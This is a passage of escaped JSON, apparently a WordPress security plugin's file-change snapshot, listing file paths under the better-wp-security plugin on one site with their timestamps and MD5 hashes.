hp\":{\"d\":1545735242,\"h\":\"ada70bb4e028b23240df0efa7dbb671c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/settings.php\":{\"d\":1545735242,\"h\":\"9008dbf53a82e144680c56abef1ed7f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/deactivate.php\":{\"d\":1545735242,\"h\":\"8633c2adea15f38f74491bf4d543874b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"8135a54561e1a714aa3261f1447ac892\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/privacy.php\":{\"d\":1545735242,\"h\":\"9fbba0bca3c9400810732301f7595fc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/settings-page.php\":{\"d\":1545735242,\"h\":\"291f309fafa57c47d1e41c729c5b26d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/validator.php\":{\"d\":1545735242,\"h\":\"c114bcd4e586aa9dc66a45cb4a73c39e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/setup.php\":{\"d\":1545735242,\"h\":\"475c1fe0058c5324ff0bc13d5e5a898b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/active.php\":{\"d\":1545735242,\"h\":\"966862ce0baca8ed326b458df9dd810e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/settings.php\":{\"d\":1545735242,\"h\":\"dadf288f21e35fe2334b49a03ae57419\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/itsec-do-security-check.php\":{\"d\":1545735242,\"h\":\"c0890c1e6d5a3acc95a70a827054d9bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/itsec-get-security-check-modules.php\":{\"d\":1545735242,\"h\":\"9b511d5c20598ed6db68b9a620094624\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/sync-verbs\\/itsec-get-security-check-feedback-response.php\":{\"d\":1545735242,\"h\":\"e52676550eaa7db7e1b2700357c6aa3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"cf42572b760ad17743d406715f190542\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/scanner.php\":{\"d\":1545735242,\"h\":\"1c4c10483972462b12175705c6f1ee99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/settings-page.php\":{\"d\":1545735242,\"h\":\"60cf764187883b9157427c1577305308\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/feedback.php\":{\"d\":1545735242,\"h\":\"36579ea4cd2ca44ba36d040143b69fa0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/active.php\":{\"d\":1545735242,\"h\":\"ad15819d8d1262e5258e9e602d0b2aa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/security-check\\/feedback-renderer.php\":{\"d\":1545735242,\"h\":\"1712673c9ac1f9cedd78dff65615f1c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/css\\/login-page.css\":{\"d\":1545735242,\"h\":\"ba73521b643df786564c09ad29270c6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"575d09b9e06b6b02563b3900170c7802\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/privacy.php\":{\"d\":1545735242,\"h\":\"e520a0dfe4e654cc8cf3d805b2b0cbab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/class-itsec-hide-backend.php\":{\"d\":1545735242,\"h\":\"381b71cec1c6578d26c3d835f84c610c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/settings-page.php\":{\"d\":1545735242,\"h\":\"85971702cffefce8f8d8d9ba2693f7a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/validator.php\":{\"d\":1545735242,\"h\":\"7c69b0de6d6b0517bf579c7086ed1d92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/setup.php\":{\"d\":1545735242,\"h\":\"20d07b179786a496c3085f2ca7e29603\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/active.php\":{\"d\":1545735242,\"h\":\"8b70beeec3ff2d7e1e172c369559e1db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/hide-backend\\/settings.php\":{\"d\":1545735242,\"h\":\"612d82f2b9106b46f1a1d640f7bdfe84\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/js\\/admin-brute-force.js\":{\"d\":1545735242,\"h\":\"f8d46e51fcc0472fb880899fb50f1414\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/settings-page.php\":{\"d\":1545735242,\"h\":\"a586bb5c525e4a6ccbe82325b854d0e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/class-itsec-brute-force.php\":{\"d\":1545735242,\"h\":\"4d95dbdc11400bca59c4543167c9a099\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/validator.php\":{\"d\":1545735242,\"h\":\"9b2df22dc03becbbe472476445e8f871\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/setup.php\":{\"d\":1545735242,\"h\":\"0fb3332c570ede669be0760e5efaab53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/logs.php\":{\"d\":1545735242,\"h\":\"ffaefac1fddb3ebd4a1e026a21b81c3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/active.php\":{\"d\":1545735242,\"h\":\"227d82506a40b25aadfd4c12c21ab9e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/settings.php\":{\"d\":1545735242,\"h\":\"7699841834537531500651419741106c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator-loadable.php\":{\"d\":1545735242,\"h\":\"570e8284c48f57717ba86ef3eeb54c16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-factory.php\":{\"d\":1545735242,\"h\":\"b5dede76087a6b4be5b4c5bf2f9bebc5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-system.php\":{\"d\":1545735242,\"h\":\"e4ddabdc77547e55f6faebd0368979a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/chunk-scanner.php\":{\"d\":1545735242,\"h\":\"dc923761f8a33bc253f0bdef951f2497\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package.php\":{\"d\":1545735242,\"h\":\"0c7b6a4bc578ddbc73a68cb0ab3c1e40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-core.php\":{\"d\":1545735242,\"h\":\"b11267edd991d5a8a28b3f6080598e8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator-managed-files.php\":{\"d\":1545735242,\"h\":\"2ad63bb669ce7f9fd00c3c89e6f39f16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator-chain.php\":{\"d\":1545735242,\"h\":\"46e44494902b1c2e648fc987423270f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-comparator.php\":{\"d\":1545735242,\"h\":\"7b44f481bd5a372ebd3925005ee13691\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-unknown.php\":{\"d\":1545735242,\"h\":\"bda07a78a8ef8123023303e2734bbb23\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-plugin.php\":{\"d\":1545735242,\"h\":\"281ecebc50b5bba287c9e3bd2299f48c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/hash-loading-failed-exception.php\":{\"d\":1545735242,\"h\":\"edca712836606ff2d7f438195ab247b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/lib\\/package-theme.php\":{\"d\":1545735242,\"h\":\"11533bae2660ad42bafbf98b6fc202bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/css\\/settings.css\":{\"d\":1545735242,\"h\":\"fb11b5f8155ec28c329040c9849df7f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/sync-verbs\\/itsec-perform-file-scan.php\":{\"d\":1545735242,\"h\":\"a07ffb2041103a2d625c4c2835b5b19c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/sync-verbs\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/sync-verbs\\/itsec-ping-file-scan.php\":{\"d\":1545735242,\"h\":\"8f9d30825073324d7a22d7ba2579310b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/images\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/jqueryFileTree.js\":{\"d\":1545735242,\"h\":\"36548e752f6a754125c83b86afed099f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/filetree\\/jqueryFileTree.css\":{\"d\":1545735242,\"h\":\"60f395cd20597c1609bea2fc572d3d4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/script.js\":{\"d\":1545735242,\"h\":\"ad7b6c35cbe3adcc594b23721161b792\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"8b32bd371658efcdb79701e9f3d2b57f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/admin-file-change-warning.js\":{\"d\":1545735242,\"h\":\"892b85a2b487aeb8f07ece552a6f8924\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/js\\/file-scanner.js\":{\"d\":1545735242,\"h\":\"e129823497a9e2c01b8f6b259a363315\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/images\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/admin.php\":{\"d\":1545735242,\"h\":\"7e2175f42c95508de061730bf9ada218\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/scanner.php\":{\"d\":1545735242,\"h\":\"2aa0055ea4864ad740eb15c805e32b45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/settings-page.php\":{\"d\":1545735242,\"h\":\"e83eb70e8718f002e7b190ae942eb032\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/class-itsec-file-change.php\":{\"d\":1545735242,\"h\":\"ec71874419a0cb3325a8a239487ad172\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/validator.php\":{\"d\":1545735242,\"h\":\"ce8565239b5ebbb702dc0ded42c752e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/activate.php\":{\"d\":1545735242,\"h\":\"6cdd39942afddcc579a271e7a8518883\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/setup.php\":{\"d\":1545735242,\"h\":\"41d488591094e6024e7ed622ee569c08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/logs.php\":{\"d\":1545735242,\"h\":\"7832069eed5648075d8d3ffea709e1dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/active.php\":{\"d\":1545735242,\"h\":\"957777c629067569779d2fa705320e0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/settings.php\":{\"d\":1545735242,\"h\":\"ffc388afa91ed3a9ffdfc492050b3551\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-change\\/deactivate.php\":{\"d\":1545735242,\"h\":\"d6ccab72ab2a6ca69aec751c7ce65f3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/content-directory\\/settings-page.php\":{\"d\":1545735242,\"h\":\"a07a22f1484675f77044d5186e405e2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/content-directory\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/content-directory\\/utility.php\":{\"d\":1545735242,\"h\":\"1b48f88106f87873b7af7d562a7ff98a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/css\\/settings-page.css\":{\"d\":1545735242,\"h\":\"5ee63d718c707314201f24dd3924caf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"188412a2f6da8c1912777dc0c3f2c89f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/settings-page.php\":{\"d\":1545735242,\"h\":\"3de544c871505eefca52a2df5fcfefd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/validator.php\":{\"d\":1545735242,\"h\":\"1d86cf643f6e925c4d20eabbbcd0c3bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/class-itsec-password-requirements.php\":{\"d\":1545735242,\"h\":\"26eb7115700601e3bb209fba8e1fa18e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/active.php\":{\"d\":1545735242,\"h\":\"c8a56cc30384349e3e75f10f4090123b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/settings.php\":{\"d\":1545735242,\"h\":\"7656ba7397a35cd56252590bb93e3807\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/js\\/script.js\":{\"d\":1545735242,\"h\":\"f6904be42b2af4be5045181b94fd2b87\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/class-itsec-strong-passwords.php\":{\"d\":1545735242,\"h\":\"d98499d04720b80b74c754ccb1baad75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/validator.php\":{\"d\":1545735242,\"h\":\"7c1b67f73a5ff55eddfdb0cb8d7c8c9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/setup.php\":{\"d\":1545735242,\"h\":\"2295eaa1dbb86cc2f092151e827b4847\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/active.php\":{\"d\":1545735242,\"h\":\"70681f1b7017ef4925ef9a99622bc21f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/strong-passwords\\/settings.php\":{\"d\":1545735242,\"h\":\"191076abf2c891d235a00991478b863a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/js\\/admin-admin-user.js\":{\"d\":1545735242,\"h\":\"1fd96f3c6412b0b509c8f23d9634f1b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/settings-page.php\":{\"d\":1545735242,\"h\":\"70b64fb07c4283abbffb7fedce52a7e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/validator.php\":{\"d\":1545735242,\"h\":\"5dcbd5612783ad7a1842885b5fd3e3fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/active.php\":{\"d\":1545735242,\"h\":\"ce407ff5715c837d02b1aba7975bf512\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/settings.php\":{\"d\":1545735242,\"h\":\"6fa14f0d7541ba8254214690a42ae52c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/class-itsec-multisite-tweaks.php\":{\"d\":1545735242,\"h\":\"fd6919df594a28cd5e2753736cebf10d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/settings-page.php\":{\"d\":1545735242,\"h\":\"c9e83ed2386cb0e415eb6a26d33959be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/validator.php\":{\"d\":1545735242,\"h\":\"3b6cf5ffa0304d31e2fbd128547f65d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/setup.php\":{\"d\":1545735242,\"h\":\"b0d1fc05a146b839c3b3df6b4ab01871\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/active.php\":{\"d\":1545735242,\"h\":\"15a693142b639bebe480363cf1eb4a9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/multisite-tweaks\\/settings.php\":{\"d\":1545735242,\"h\":\"4f042b651ccc0e0237779a84e972266a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/js\\/admin-four-oh-four.js\":{\"d\":1545735242,\"h\":\"45b5ac6b844b96ee18e5500a6dd80678\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.co